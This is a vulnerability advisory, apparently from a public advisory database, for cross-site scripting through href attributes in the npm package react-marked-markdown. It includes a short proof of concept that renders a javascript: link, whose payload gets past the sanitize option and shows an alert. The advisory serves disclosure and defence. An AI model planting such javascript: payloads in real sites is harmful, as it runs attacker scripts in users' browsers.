GHSA-m7qm-r2r5-f77q

Suggest an improvement
Source
https://github.com/advisories/GHSA-m7qm-r2r5-f77q
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-m7qm-r2r5-f77q/GHSA-m7qm-r2r5-f77q.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-m7qm-r2r5-f77q
Published
2020-09-01T20:43:48Z
Modified
2021-09-24T20:35:29Z
Summary
Cross-Site Scripting in react-marked-markdown
Details

All versions of react-marked-markdown are vulnerable to cross-site scripting (XSS) via href attributes. This is exploitable if user is provided to react-marked-markdown

Proof of concept:

import React from 'react'
import ReactDOM from 'react-dom'
import { MarkdownPreview } from 'react-marked-markdown'

ReactDOM.render(
<MarkdownPreview
markedOptions={{ sanitize: true }}
value={'[XSS](javascript: alert`1`)'}
/>,
document.getElementById('root')
)

Recommendation

No fix is currently available for this vulnerability. It is our recommendation to not install or use this module at this time if you allow user input into href values.

Database specific
{
    "cwe_ids":  [
        "CWE-79"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2020-08-31T18:32:03Z",
    "nvd_published_at":  null,
    "severity":  "HIGH"
}
References

Affected packages

npm / react-marked-markdown

Package

Name
react-marked-markdown
View open source insights on deps.dev
Purl
pkg:npm/react-marked-markdown

Affected ranges

Type
SEMVER
Events
Introduced
0.0.0

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-m7qm-r2r5-f77q/GHSA-m7qm-r2r5-f77q.json"